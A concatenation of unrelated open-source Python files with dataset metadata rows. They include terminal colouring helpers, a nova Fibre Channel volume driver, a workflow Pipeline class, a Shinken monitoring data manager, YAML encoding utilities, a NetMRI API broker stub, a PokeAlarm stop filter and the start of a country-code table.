try:
import termios, fcntl, struct
call = fcntl.ioctl(0, termios.TIOCGWINSZ,
struct.pack('hhhh', 0, 0, 0, 0))
height, width = struct.unpack('hhhh', call)[:2]
terminal_width = width
except (SystemExit, KeyboardInterrupt):
raise
except:
# FALLBACK
terminal_width = int(os.environ.get('COLUMNS', 80)) - 1
return terminal_width
_tw = get_terminal_width()
def term_width_line(text):
if not codes:
# if no coloring, don't output fancy backspaces
return text + '\n'
else:
# codes are not displayed, this must be taken into account
return text.ljust(_tw + len(text) - len(_ansi_re.sub('', text))) + '\r'
def color_terminal():
if not hasattr(sys.stdout, 'isatty'):
return False
if not sys.stdout.isatty():
return False
if 'COLORTERM' in os.environ:
return True
term = os.environ.get('TERM', 'dumb').lower()
if term in ('xterm', 'linux') or 'color' in term:
return True
return False
def nocolor():
codes.clear()
def coloron():
codes.update(_orig_codes)
def colorize(name, text):
return codes.get(name, '') + text + codes.get('reset', '')
def create_color_func(name):
def inner(text):
return colorize(name, text)
globals()[name] = inner
_attrs = {
'reset': '39;49;00m',
'bold': '01m',
'faint': '02m',
'standout': '03m',
'underline': '04m',
'blink': '05m',
}
for _name, _value in _attrs.items():
codes[_name] = '\x1b[' + _value
_colors = [
('black', 'darkgray'),
('darkred', 'red'),
('darkgreen', 'green'),
('brown', 'yellow'),
('darkblue', 'blue'),
('purple', 'fuchsia'),
('turquoise', 'teal'),
('lightgray', 'white'),
]
for i, (dark, light) in enumerate(_colors):
codes[dark] = '\x1b[%im' % (i+30)
codes[light] = '\x1b[%i;01m' % (i+30)
_orig_codes = codes.copy()
for _name in codes:
create_color_func(_name)
| agpl-3.0 | -2,138,386,143,499,903,700 | 23.059406 | 79 | 0.55679 | false |
JioCloud/nova_test_latest | nova/virt/libvirt/volume/fibrechannel.py | 5 | 3175 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from os_brick.initiator import connector
from oslo_config import cfg
from oslo_log import log as logging
from nova import utils
from nova.virt.libvirt.volume import volume as libvirt_volume
CONF = cfg.CONF
CONF.import_opt('num_iscsi_scan_tries', 'nova.virt.libvirt.volume.volume',
group='libvirt')
LOG = logging.getLogger(__name__)
class LibvirtFibreChannelVolumeDriver(libvirt_volume.LibvirtBaseVolumeDriver):
"""Driver to attach Fibre Channel Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtFibreChannelVolumeDriver,
self).__init__(connection, is_block_dev=False)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'FIBRE_CHANNEL', utils._get_root_helper(),
use_multipath=CONF.libvirt.iscsi_use_multipath,
device_scan_attempts=CONF.libvirt.num_iscsi_scan_tries)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtFibreChannelVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
def connect_volume(self, connection_info, disk_info):
"""Attach the volume to instance_name."""
LOG.debug("Calling os-brick to attach FC Volume")
device_info = self.connector.connect_volume(connection_info['data'])
LOG.debug("Attached FC volume %s", device_info)
connection_info['data']['device_path'] = device_info['path']
if 'multipath_id' in device_info:
connection_info['data']['multipath_id'] = \
device_info['multipath_id']
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
LOG.debug("calling os-brick to detach FC Volume")
# TODO(walter-boring) eliminated the need for preserving
# multipath_id. Use scsi_id instead of multipath -ll
# This will then eliminate the need to pass anything in
# the 2nd param of disconnect_volume and be consistent
# with the rest of the connectors.
self.connector.disconnect_volume(connection_info['data'],
connection_info['data'])
LOG.debug("Disconnected FC Volume %s", disk_dev)
super(LibvirtFibreChannelVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
| apache-2.0 | -911,435,707,571,293,300 | 40.776316 | 78 | 0.666772 | false |
vivek-bala/radical.entk-0.6 | src/radical/entk/pipeline/pipeline.py | 2 | 5917 | import radical.utils as ru
from radical.entk.exceptions import *
from radical.entk.stage.stage import Stage
import threading
from radical.entk import states
class Pipeline(object):
"""
A pipeline represents a collection of objects that have a linear temporal execution order.
In this case, a pipeline consists of multiple 'Stage' objects. Each ```Stage_i``` can execute only
after all stages up to ```Stage_(i-1)``` have completed execution.
"""
def __init__(self):
self._uid = ru.generate_id('radical.entk.pipeline')
self._stages = list()
self._name = str()
self._state = states.NEW
# To keep track of current state
self._stage_count = len(self._stages)
self._cur_stage = 0
# Lock around current stage
self._lock = threading.Lock()
# To keep track of termination of pipeline
self._completed_flag = threading.Event()
def _validate_stages(self, stages):
if not isinstance(stages, list):
stages = [stages]
for val in stages:
if not isinstance(val, Stage):
raise TypeError(expected_type=Stage, actual_type=type(val))
return stages
# -----------------------------------------------
# Getter functions
# -----------------------------------------------
@property
def name(self):
"""
Name of the pipeline
:getter: Returns the name of the pipeline
:setter: Assigns the name of the pipeline
:type: String
"""
return self._name
@property
def stages(self):
"""
Stages of the list
:getter: Returns the stages in the current Pipeline
:setter: Assigns the stages to the current Pipeline
:type: List
"""
return self._stages
@property
def state(self):
"""
Current state of the pipeline
:getter: Returns the state of the current pipeline
:type: String
"""
return self._state
@property
def _stage_lock(self):
"""
Returns the lock over the current Pipeline
:return: Lock object
"""
return self._lock
@property
def _completed(self):
"""
Returns whether the Pipeline has completed
:return: Boolean
"""
return self._completed_flag.is_set()
@property
def _current_stage(self):
"""
Returns the current stage being executed
:return: Integer
"""
return self._cur_stage
@property
def uid(self):
"""
Unique ID of the current pipeline
:getter: Returns the unique id of the current pipeline
:type: String
"""
return self._uid
# -----------------------------------------------
# -----------------------------------------------
# Setter functions
# -----------------------------------------------
@name.setter
def name(self, value):
if isinstance(value,str):
self._name = value
else:
raise TypeError(expected_type=str, actual_type=type(value))
@stages.setter
def stages(self, stages):
self._stages = self._validate_stages(stages)
self._pass_uid()
self._stage_count = len(self._stages)
@state.setter
def state(self, value):
if isinstance(value,str):
self._state = value
else:
raise TypeError(expected_type=str, actual_type=type(value))
# -----------------------------------------------
def add_stages(self, stages):
"""
Appends stages to the current Pipeline
:argument: List of Stage objects
"""
stages = self._validate_stages(stages)
stages = self._pass_uid(stages)
self._stages.extend(stages)
self._stage_count = len(self._stages)
def remove_stages(self, stage_names):
"""
Remove stages from the current Pipeline
:argument: List of stage names as strings
"""
if not isinstance(stage_names, list):
stage_names = [stage_names]
for val in stage_names:
if not isinstance(val, str):
raise TypeError(expected_type=str, actual_type=type(val))
copy_of_existing_stages = self._stages
copy_stage_names = stage_names
for stage in self._stages:
for stage_name in stage_names:
if stage.name == stage_name:
copy_of_existing_stages.remove(stage)
copy_stage_names.remove(stage)
stage_names = copy_stage_names
self._stages = copy_of_existing_stages
self._stage_count = len(self._stages)
def _pass_uid(self, stages=None):
"""
Pass current Pipeline's uid to all stages
:argument: List of Stage objects (optional)
:return: List of updated Stage objects
"""
if stages is None:
for stage in self._stages:
stage._parent_pipeline = self._uid
stage._pass_uid()
else:
for stage in stages:
stage._parent_pipeline = self._uid
stage._pass_uid()
return stages
def _increment_stage(self):
"""
Increment pointer to current stage, also check if Pipeline has completed
"""
if self._cur_stage < self._stage_count-1:
self._cur_stage+=1
else:
self._completed_flag.set()
def _decrement_stage(self):
"""
Decrement pointer to current stage
"""
if self._cur_stage > 1:
self._cur_stage -= 1
self._completed_flag = threading.Event() # reset
| mit | -7,714,318,281,532,125,000 | 22.577689 | 102 | 0.524759 | false |
KerkhoffTechnologies/shinken | shinken/misc/datamanager.py | 17 | 12704 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
from shinken.util import safe_print
from shinken.misc.sorter import hst_srv_sort, last_state_change_earlier
from shinken.misc.filter import only_related_to
class DataManager(object):
def __init__(self):
self.rg = None
def load(self, rg):
self.rg = rg
# UI will launch us names in str, we got unicode
# in our rg, so we must manage it here
def get_host(self, hname):
hname = hname.decode('utf8', 'ignore')
return self.rg.hosts.find_by_name(hname)
def get_service(self, hname, sdesc):
hname = hname.decode('utf8', 'ignore')
sdesc = sdesc.decode('utf8', 'ignore')
return self.rg.services.find_srv_by_name_and_hostname(hname, sdesc)
def get_all_hosts_and_services(self):
all = []
all.extend(self.rg.hosts)
all.extend(self.rg.services)
return all
def get_contact(self, name):
name = name.decode('utf8', 'ignore')
return self.rg.contacts.find_by_name(name)
def get_contactgroup(self, name):
name = name.decode('utf8', 'ignore')
return self.rg.contactgroups.find_by_name(name)
def get_contacts(self):
return self.rg.contacts
def get_hostgroups(self):
return self.rg.hostgroups
def get_hostgroup(self, name):
return self.rg.hostgroups.find_by_name(name)
def get_servicegroups(self):
return self.rg.servicegroups
def get_servicegroup(self, name):
return self.rg.servicegroups.find_by_name(name)
# Get the hostgroups sorted by names, and zero size in the end
# if selected one, put it in the first place
def get_hostgroups_sorted(self, selected=''):
r = []
selected = selected.strip()
hg_names = [hg.get_name() for hg in self.rg.hostgroups
if len(hg.members) > 0 and hg.get_name() != selected]
hg_names.sort()
hgs = [self.rg.hostgroups.find_by_name(n) for n in hg_names]
hgvoid_names = [hg.get_name() for hg in self.rg.hostgroups
if len(hg.members) == 0 and hg.get_name() != selected]
hgvoid_names.sort()
hgvoids = [self.rg.hostgroups.find_by_name(n) for n in hgvoid_names]
if selected:
hg = self.rg.hostgroups.find_by_name(selected)
if hg:
r.append(hg)
r.extend(hgs)
r.extend(hgvoids)
return r
def get_hosts(self):
return self.rg.hosts
def get_services(self):
return self.rg.services
def get_schedulers(self):
return self.rg.schedulers
def get_pollers(self):
return self.rg.pollers
def get_brokers(self):
return self.rg.brokers
def get_receivers(self):
return self.rg.receivers
def get_reactionners(self):
return self.rg.reactionners
def get_program_start(self):
for c in self.rg.configs.values():
return c.program_start
return None
def get_realms(self):
return self.rg.realms
def get_realm(self, r):
if r in self.rg.realms:
return r
return None
# Get the hosts tags sorted by names, and zero size in the end
def get_host_tags_sorted(self):
r = []
names = self.rg.tags.keys()
names.sort()
for n in names:
r.append((n, self.rg.tags[n]))
return r
# Get the hosts tagged with a specific tag
def get_hosts_tagged_with(self, tag):
r = []
for h in self.get_hosts():
if tag in h.get_host_tags():
r.append(h)
return r
# Get the services tags sorted by names, and zero size in the end
def get_service_tags_sorted(self):
r = []
names = self.rg.services_tags.keys()
names.sort()
for n in names:
r.append((n, self.rg.services_tags[n]))
return r
def get_important_impacts(self):
res = []
for s in self.rg.services:
if s.is_impact and s.state not in ['OK', 'PENDING']:
if s.business_impact > 2:
res.append(s)
for h in self.rg.hosts:
if h.is_impact and h.state not in ['UP', 'PENDING']:
if h.business_impact > 2:
res.append(h)
return res
# Returns all problems
def get_all_problems(self, to_sort=True, get_acknowledged=False):
res = []
if not get_acknowledged:
res.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and
not s.is_impact and not s.problem_has_been_acknowledged and
not s.host.problem_has_been_acknowledged])
res.extend([h for h in self.rg.hosts
if h.state not in ['UP', 'PENDING'] and
not h.is_impact and not h.problem_has_been_acknowledged])
else:
res.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and not s.is_impact])
res.extend([h for h in self.rg.hosts
if h.state not in ['UP', 'PENDING'] and not h.is_impact])
if to_sort:
res.sort(hst_srv_sort)
return res
# returns problems, but the most recent before
def get_problems_time_sorted(self):
pbs = self.get_all_problems(to_sort=False)
pbs.sort(last_state_change_earlier)
return pbs
# Return all non managed impacts
def get_all_impacts(self):
res = []
for s in self.rg.services:
if s.is_impact and s.state not in ['OK', 'PENDING']:
# If s is acked, pass
if s.problem_has_been_acknowledged:
continue
# We search for impacts that were NOT currently managed
if len([p for p in s.source_problems if not p.problem_has_been_acknowledged]) > 0:
res.append(s)
for h in self.rg.hosts:
if h.is_impact and h.state not in ['UP', 'PENDING']:
# If h is acked, pass
if h.problem_has_been_acknowledged:
continue
# We search for impacts that were NOT currently managed
if len([p for p in h.source_problems if not p.problem_has_been_acknowledged]) > 0:
res.append(h)
return res
# Return the number of problems
def get_nb_problems(self):
return len(self.get_all_problems(to_sort=False))
# Get the number of all problems, even the ack ones
def get_nb_all_problems(self, user):
res = []
res.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and not s.is_impact])
res.extend([h for h in self.rg.hosts
if h.state not in ['UP', 'PENDING'] and not h.is_impact])
return len(only_related_to(res, user))
# Return the number of impacts
def get_nb_impacts(self):
return len(self.get_all_impacts())
def get_nb_elements(self):
return len(self.rg.services) + len(self.rg.hosts)
def get_important_elements(self):
res = []
# We want REALLY important things, so business_impact > 2, but not just IT elements that are
# root problems, so we look only for config defined my_own_business_impact value too
res.extend([s for s in self.rg.services
if (s.business_impact > 2 and not 0 <= s.my_own_business_impact <= 2)])
res.extend([h for h in self.rg.hosts
if (h.business_impact > 2 and not 0 <= h.my_own_business_impact <= 2)])
print "DUMP IMPORTANT"
for i in res:
safe_print(i.get_full_name(), i.business_impact, i.my_own_business_impact)
return res
# For all business impacting elements, and give the worse state
# if warning or critical
def get_overall_state(self):
h_states = [h.state_id for h in self.rg.hosts
if h.business_impact > 2 and h.is_impact and h.state_id in [1, 2]]
s_states = [s.state_id for s in self.rg.services
if s.business_impact > 2 and s.is_impact and s.state_id in [1, 2]]
print "get_overall_state:: hosts and services business problems", h_states, s_states
if len(h_states) == 0:
h_state = 0
else:
h_state = max(h_states)
if len(s_states) == 0:
s_state = 0
else:
s_state = max(s_states)
# Ok, now return the max of hosts and services states
return max(h_state, s_state)
# Same but for pure IT problems
def get_overall_it_state(self):
h_states = [h.state_id for h in self.rg.hosts if h.is_problem and h.state_id in [1, 2]]
s_states = [s.state_id for s in self.rg.services if s.is_problem and s.state_id in [1, 2]]
if len(h_states) == 0:
h_state = 0
else:
h_state = max(h_states)
if len(s_states) == 0:
s_state = 0
else:
s_state = max(s_states)
# Ok, now return the max of hosts and services states
return max(h_state, s_state)
# Get percent of all Services
def get_per_service_state(self):
all_services = self.rg.services
problem_services = []
problem_services.extend([s for s in self.rg.services
if s.state not in ['OK', 'PENDING'] and not s.is_impact])
if len(all_services) == 0:
res = 0
else:
res = int(100 - (len(problem_services) * 100) / float(len(all_services)))
return res
# Get percent of all Hosts
def get_per_hosts_state(self):
all_hosts = self.rg.hosts
problem_hosts = []
problem_hosts.extend([s for s in self.rg.hosts
if s.state not in ['UP', 'PENDING'] and not s.is_impact])
if len(all_hosts) == 0:
res = 0
else:
res = int(100 - (len(problem_hosts) * 100) / float(len(all_hosts)))
return res
# For all business impacting elements, and give the worse state
# if warning or critical
def get_len_overall_state(self):
h_states = [h.state_id for h in self.rg.hosts
if h.business_impact > 2 and h.is_impact and h.state_id in [1, 2]]
s_states = [s.state_id for s in self.rg.services
if s.business_impact > 2 and s.is_impact and s.state_id in [1, 2]]
print "get_len_overall_state:: hosts and services business problems", h_states, s_states
# Just return the number of impacting elements
return len(h_states) + len(s_states)
# Return a tree of {'elt': Host, 'fathers': [{}, {}]}
def get_business_parents(self, obj, levels=3):
res = {'node': obj, 'fathers': []}
# if levels == 0:
# return res
for i in obj.parent_dependencies:
# We want to get the levels deep for all elements, but
# go as far as we should for bad elements
if levels != 0 or i.state_id != 0:
par_elts = self.get_business_parents(i, levels=levels - 1)
res['fathers'].append(par_elts)
print "get_business_parents::Give elements", res
return res
# Ok, we do not have true root problems, but we can try to guess isn't it?
# We can just guess for services with the same services of this host in fact
def guess_root_problems(self, obj):
if obj.__class__.my_type != 'service':
return []
r = [s for s in obj.host.services if s.state_id != 0 and s != obj]
return r
datamgr = DataManager()
| agpl-3.0 | -1,641,608,022,287,670,500 | 35.505747 | 100 | 0.578322 | false |
stephane-martin/salt-debian-packaging | salt-2016.3.3/salt/utils/yamlencoding.py | 3 | 1477 | # -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import
import io
# Import 3rd-party libs
import yaml
import salt.ext.six as six
def yaml_dquote(text):
'''
Make text into a double-quoted YAML string with correct escaping
for special characters. Includes the opening and closing double
quote characters.
'''
with io.StringIO() as ostream:
yemitter = yaml.emitter.Emitter(ostream)
yemitter.write_double_quoted(six.text_type(text))
return ostream.getvalue()
def yaml_squote(text):
'''
Make text into a single-quoted YAML string with correct escaping
for special characters. Includes the opening and closing single
quote characters.
'''
with io.StringIO() as ostream:
yemitter = yaml.emitter.Emitter(ostream)
yemitter.write_single_quoted(six.text_type(text))
return ostream.getvalue()
def yaml_encode(data):
'''
A simple YAML encode that can take a single-element datatype and return
a string representation.
'''
yrepr = yaml.representer.SafeRepresenter()
ynode = yrepr.represent_data(data)
if not isinstance(ynode, yaml.ScalarNode):
raise TypeError(
"yaml_encode() only works with YAML scalar data;"
" failed for {0}".format(type(data))
)
tag = ynode.tag.rsplit(':', 1)[-1]
ret = ynode.value
if tag == "str":
ret = yaml_dquote(ynode.value)
return ret
| apache-2.0 | -1,531,240,202,982,533,600 | 25.854545 | 75 | 0.654705 | false |
infobloxopen/infoblox-netmri | infoblox_netmri/api/broker/v3_6_0/apic_setting_broker.py | 5 | 2774 | from ..broker import Broker
class ApicSettingBroker(Broker):
controller = "apic_settings"
def index(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("find"), kwargs)
def show(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def create(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("create"), kwargs)
def update(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
def destroy(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("destroy"), kwargs)
def destroy_many(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("destroy_many"), kwargs)
def dump_apic_controllers(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("dump_apic_controllers"), kwargs)
def import_controllers(self, **kwargs):
"""This method is no longer exists. Please use such method from SDN Settings
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("import_controllers"), kwargs)
| apache-2.0 | -4,035,939,897,109,853,700 | 23.121739 | 91 | 0.566691 | false |
fosJoddie/PokeAlarm | PokeAlarm/Filters/StopFilter.py | 1 | 2372 | # Standard Library Imports
import operator
# 3rd Party Imports
# Local Imports
from . import BaseFilter
class StopFilter(BaseFilter):
""" Filter class for limiting which stops trigger a notification. """
def __init__(self, name, data):
""" Initializes base parameters for a filter. """
super(StopFilter, self).__init__(name)
# Distance
self.min_dist = self.evaluate_attribute( # f.min_dist <= m.distance
event_attribute='distance', eval_func=operator.le,
limit=BaseFilter.parse_as_type(float, 'min_dist', data))
self.max_dist = self.evaluate_attribute( # f.max_dist <= m.distance
event_attribute='distance', eval_func=operator.ge,
limit=BaseFilter.parse_as_type(float, 'max_dist', data))
# Time Left
self.min_time_left = self.evaluate_attribute(
# f.min_time_left <= r.time_left
event_attribute='time_left', eval_func=operator.le,
limit=BaseFilter.parse_as_type(int, 'min_time_left', data))
self.max_time_left = self.evaluate_attribute(
# f.max_time_left >= r.time_left
event_attribute='time_left', eval_func=operator.ge,
limit=BaseFilter.parse_as_type(int, 'max_time_left', data))
# Geofences
self.geofences = BaseFilter.parse_as_set(str, 'geofences', data)
# Custom DTS
self.custom_dts = BaseFilter.parse_as_dict(
str, str, 'custom_dts', data)
# Missing Info
self.is_missing_info = BaseFilter.parse_as_type(
bool, 'is_missing_info', data)
# Reject leftover parameters
for key in data:
raise ValueError("'{}' is not a recognized parameter for"
" Stop filters".format(key))
def to_dict(self):
""" Create a dict representation of this Filter. """
settings = {}
# Distance
if self.min_dist is not None:
settings['min_dist'] = self.min_dist
if self.max_dist is not None:
settings['max_dist'] = self.max_dist
# Geofences
if self.geofences is not None:
settings['geofences'] = self.geofences
# Missing Info
if self.is_missing_info is not None:
settings['missing_info'] = self.is_missing_info
return settings
| agpl-3.0 | 302,555,712,462,100,700 | 34.402985 | 76 | 0.591906 | false |
isnnn/Sick-Beard-TPB | lib/subliminal/language.py | 23 | 54744 | # -*- coding: utf-8 -*-
# Copyright 2011-2012 Antoine Bertin <[email protected]>
#
# This file is part of subliminal.
#
# subliminal is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# subliminal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with subliminal. If not, see <http://www.gnu.org/licenses/>.
from .utils import to_unicode
import re
import logging
logger = logging.getLogger("subliminal")
COUNTRIES = [('AF', 'AFG', '004', u'Afghanistan'),
('AX', 'ALA', '248', u'Åland Islands'),
('AL', 'ALB', '008', u'Albania'),
('DZ', 'DZA', '012', u'Algeria'),
('AS', 'ASM', '016', u'American Samoa'),
('AD', 'AND', '020', u'Andorra'),
('AO', 'AGO', '024', u'Angola'),
('AI', 'AIA', '660', u'Anguilla'),
('AQ', 'ATA', '010', u'Antarctica'),
('AG', 'ATG', '028', u'Antigua and Barbuda'),
('AR', 'ARG', '032', u'Argentina'),
('AM', 'ARM', '051', u'Armenia'),
('AW', 'ABW', '533', u'Aruba'),
('AU', 'AUS', '036', u'Australia'),
('AT', 'AUT', '040', u'Austria'),
('AZ', 'AZE', '031', u'Azerbaijan'),
('BS', 'BHS', '044', u'Bahamas'),
('BH', 'BHR', '048', u'Bahrain'),
('BD', 'BGD', '050', u'Bangladesh'),
('BB', 'BRB', '052', u'Barbados'),
('BY', 'BLR', '112', u'Belarus'),
('BE', 'BEL', '056', u'Belgium'),
('BZ', 'BLZ', '084', u'Belize'),
('BJ', 'BEN', '204', u'Benin'),
('BM', 'BMU', '060', u'Bermuda'),
('BT', 'BTN', '064', u'Bhutan'),
('BO', 'BOL', '068', u'Bolivia, Plurinational State of'),
('BQ', 'BES', '535', u'Bonaire, Sint Eustatius and Saba'),
('BA', 'BIH', '070', u'Bosnia and Herzegovina'),
('BW', 'BWA', '072', u'Botswana'),
('BV', 'BVT', '074', u'Bouvet Island'),
('BR', 'BRA', '076', u'Brazil'),
('IO', 'IOT', '086', u'British Indian Ocean Territory'),
('BN', 'BRN', '096', u'Brunei Darussalam'),
('BG', 'BGR', '100', u'Bulgaria'),
('BF', 'BFA', '854', u'Burkina Faso'),
('BI', 'BDI', '108', u'Burundi'),
('KH', 'KHM', '116', u'Cambodia'),
('CM', 'CMR', '120', u'Cameroon'),
('CA', 'CAN', '124', u'Canada'),
('CV', 'CPV', '132', u'Cape Verde'),
('KY', 'CYM', '136', u'Cayman Islands'),
('CF', 'CAF', '140', u'Central African Republic'),
('TD', 'TCD', '148', u'Chad'),
('CL', 'CHL', '152', u'Chile'),
('CN', 'CHN', '156', u'China'),
('CX', 'CXR', '162', u'Christmas Island'),
('CC', 'CCK', '166', u'Cocos (Keeling) Islands'),
('CO', 'COL', '170', u'Colombia'),
('KM', 'COM', '174', u'Comoros'),
('CG', 'COG', '178', u'Congo'),
('CD', 'COD', '180', u'Congo, The Democratic Republic of the'),
('CK', 'COK', '184', u'Cook Islands'),
('CR', 'CRI', '188', u'Costa Rica'),
('CI', 'CIV', '384', u'Côte d\'Ivoire'),
('HR', 'HRV', '191', u'Croatia'),
('CU', 'CUB', '192', u'Cuba'),
('CW', 'CUW', '531', u'Curaçao'),
('CY', 'CYP', '196', u'Cyprus'),
('CZ', 'CZE', '203', u'Czech Republic'),
('DK', 'DNK', '208', u'Denmark'),
('DJ', 'DJI', '262', u'Djibouti'),
('DM', 'DMA', '212', u'Dominica'),
('DO', 'DOM', '214', u'Dominican Republic'),
('EC', 'ECU', '218', u'Ecuador'),
('EG', 'EGY', '818', u'Egypt'),
('SV', 'SLV', '222', u'El Salvador'),
('GQ', 'GNQ', '226', u'Equatorial Guinea'),
('ER', 'ERI', '232', u'Eritrea'),
('EE', 'EST', '233', u'Estonia'),
('ET', 'ETH', '231', u'Ethiopia'),
('FK', 'FLK', '238', u'Falkland Islands (Malvinas)'),
('FO', 'FRO', '234', u'Faroe Islands'),
('FJ', 'FJI', '242', u'Fiji'),
('FI', 'FIN', '246', u'Finland'),
('FR', 'FRA', '250', u'France'),
('GF', 'GUF', '254', u'French Guiana'),
('PF', 'PYF', '258', u'French Polynesia'),
('TF', 'ATF', '260', u'French Southern Territories'),
('GA', 'GAB', '266', u'Gabon'),
('GM', 'GMB', '270', u'Gambia'),
('GE', 'GEO', '268', u'Georgia'),
('DE', 'DEU', '276', u'Germany'),
('GH', 'GHA', '288', u'Ghana'),
('GI', 'GIB', '292', u'Gibraltar'),
('GR', 'GRC', '300', u'Greece'),
('GL', 'GRL', '304', u'Greenland'),
('GD', 'GRD', '308', u'Grenada'),
('GP', 'GLP', '312', u'Guadeloupe'),
('GU', 'GUM', '316', u'Guam'),
('GT', 'GTM', '320', u'Guatemala'),
('GG', 'GGY', '831', u'Guernsey'),
('GN', 'GIN', '324', u'Guinea'),
('GW', 'GNB', '624', u'Guinea-Bissau'),
('GY', 'GUY', '328', u'Guyana'),
('HT', 'HTI', '332', u'Haiti'),
('HM', 'HMD', '334', u'Heard Island and McDonald Islands'),
('VA', 'VAT', '336', u'Holy See (Vatican City State)'),
('HN', 'HND', '340', u'Honduras'),
('HK', 'HKG', '344', u'Hong Kong'),
('HU', 'HUN', '348', u'Hungary'),
('IS', 'ISL', '352', u'Iceland'),
('IN', 'IND', '356', u'India'),
('ID', 'IDN', '360', u'Indonesia'),
('IR', 'IRN', '364', u'Iran, Islamic Republic of'),
('IQ', 'IRQ', '368', u'Iraq'),
('IE', 'IRL', '372', u'Ireland'),
('IM', 'IMN', '833', u'Isle of Man'),
('IL', 'ISR', '376', u'Israel'),
('IT', 'ITA', '380', u'Italy'),
('JM', 'JAM', '388', u'Jamaica'),
('JP', 'JPN', '392', u'Japan'),
('JE', 'JEY', '832', u'Jersey'),
('JO', 'JOR', '400', u'Jordan'),
('KZ', 'KAZ', '398', u'Kazakhstan'),
('KE', 'KEN', '404', u'Kenya'),
('KI', 'KIR', '296', u'Kiribati'),
('KP', 'PRK', '408', u'Korea, Democratic People\'s Republic of'),
('KR', 'KOR', '410', u'Korea, Republic of'),
('KW', 'KWT', '414', u'Kuwait'),
('KG', 'KGZ', '417', u'Kyrgyzstan'),
('LA', 'LAO', '418', u'Lao People\'s Democratic Republic'),
('LV', 'LVA', '428', u'Latvia'),
('LB', 'LBN', '422', u'Lebanon'),
('LS', 'LSO', '426', u'Lesotho'),
('LR', 'LBR', '430', u'Liberia'),
('LY', 'LBY', '434', u'Libya'),
('LI', 'LIE', '438', u'Liechtenstein'),
('LT', 'LTU', '440', u'Lithuania'),
('LU', 'LUX', '442', u'Luxembourg'),
('MO', 'MAC', '446', u'Macao'),
('MK', 'MKD', '807', u'Macedonia, Republic of'),
('MG', 'MDG', '450', u'Madagascar'),
('MW', 'MWI', '454', u'Malawi'),
('MY', 'MYS', '458', u'Malaysia'),
('MV', 'MDV', '462', u'Maldives'),
('ML', 'MLI', '466', u'Mali'),
('MT', 'MLT', '470', u'Malta'),
('MH', 'MHL', '584', u'Marshall Islands'),
('MQ', 'MTQ', '474', u'Martinique'),
('MR', 'MRT', '478', u'Mauritania'),
('MU', 'MUS', '480', u'Mauritius'),
('YT', 'MYT', '175', u'Mayotte'),
('MX', 'MEX', '484', u'Mexico'),
('FM', 'FSM', '583', u'Micronesia, Federated States of'),
('MD', 'MDA', '498', u'Moldova, Republic of'),
('MC', 'MCO', '492', u'Monaco'),
('MN', 'MNG', '496', u'Mongolia'),
('ME', 'MNE', '499', u'Montenegro'),
('MS', 'MSR', '500', u'Montserrat'),
('MA', 'MAR', '504', u'Morocco'),
('MZ', 'MOZ', '508', u'Mozambique'),
('MM', 'MMR', '104', u'Myanmar'),
('NA', 'NAM', '516', u'Namibia'),
('NR', 'NRU', '520', u'Nauru'),
('NP', 'NPL', '524', u'Nepal'),
('NL', 'NLD', '528', u'Netherlands'),
('NC', 'NCL', '540', u'New Caledonia'),
('NZ', 'NZL', '554', u'New Zealand'),
